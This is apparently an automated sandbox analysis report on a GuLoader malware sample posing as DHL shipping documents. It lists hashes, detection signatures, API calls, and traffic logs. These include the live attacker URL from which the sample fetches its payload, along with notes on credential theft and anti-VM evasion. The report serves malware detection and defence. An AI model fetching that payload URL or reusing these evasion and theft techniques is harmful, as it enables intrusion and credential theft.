Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe

Overview

General Information

Sample name:DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
Analysis ID:1465167
MD5:6a8d426b602c62ff313a431b6f026b6b
SHA1:e7955a9399f8d836ed29c99463ba8e4fbae34364
SHA256:1baf9b4c1a0152616a56d2212c88af4f5e791257f54ee3252ba0cefa4f587a07
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Initial sample is a PE file and has a suspicious name
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.6345828511.0000000036BD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.1438112773.00000000083AE000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000009.00000002.6321510839.000000000542E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe PID: 6120JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeAvira: detected
          Source: http://109.248.151.29/MnBzHGsyHle133.binAvira URL Cloud: Label: malware
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeVirustotal: Detection: 15%Perma Link
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.11.20:49739 version: TLS 1.2
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_00405A4F
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,9_2_00405A4F
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_00406620 FindFirstFileA,FindClose,9_2_00406620
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_004027CF FindFirstFileA,9_2_004027CF
          Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
          Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: api.ipify.org
          Source: unknownDNS query: name: api.ipify.org
          Source: unknownDNS query: name: api.ipify.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /MnBzHGsyHle133.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 109.248.151.29Cache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: unknownTCP traffic detected without corresponding DNS query: 109.248.151.29
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /MnBzHGsyHle133.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 109.248.151.29Cache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: api.ipify.org
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6335321525.0000000006408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.248.151.29/MnBzHGsyHle133.bin(3
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6335321525.0000000006408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.248.151.29/MnBzHGsyHle133.bin3
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmp, DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000000.00000000.1231425770.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036C5C000.00000004.00000800.00020000.00000000.sdmp, DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.skinstudio.netG
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036C5C000.00000004.00000800.00020000.00000000.sdmp, DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036C5C000.00000004.00000800.00020000.00000000.sdmp, DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/TtK
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036C5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/p
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036C5C000.00000004.00000800.00020000.00000000.sdmp, DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036B81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000009.00000002.6345828511.0000000036C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.11.20:49739 version: TLS 1.2
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040550F

          System Summary

          barindex
          Source: initial sampleStatic PE information: Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
          Source: initial sampleStatic PE information: Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,LdrInitializeThunk,GetVersionExA,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004033D8
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,LdrInitializeThunk,GetVersionExA,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,9_2_004033D8
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_004072D10_2_004072D1
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_00406AFA0_2_00406AFA
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_6F7A1B280_2_6F7A1B28
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_004072D19_2_004072D1
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_00406AFA9_2_00406AFA
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_001139009_2_00113900
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_0011BBC89_2_0011BBC8
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_0011ACCE9_2_0011ACCE
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_001145189_2_00114518
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_00113C489_2_00113C48
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_001184689_2_00118468
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_38DE14389_2_38DE1438
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: String function: 00402C5E appears 50 times
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedissever.exeDVarFileInfo$ vs DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/17@1/2
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,LdrInitializeThunk,GetVersionExA,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004033D8
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 9_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,LdrInitializeThunk,GetVersionExA,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,9_2_004033D8
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_004047BF GetDlgItem,SetWindowTextA,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA,0_2_004047BF
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeCode function: 0_2_00402198 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,0_2_00402198
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semesJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeMutant created: NULL
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nso9ACA.tmpJump to behavior
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeVirustotal: Detection: 15%
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeFile read: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe "C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess created: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe "C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeProcess created: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe "C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"Jump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
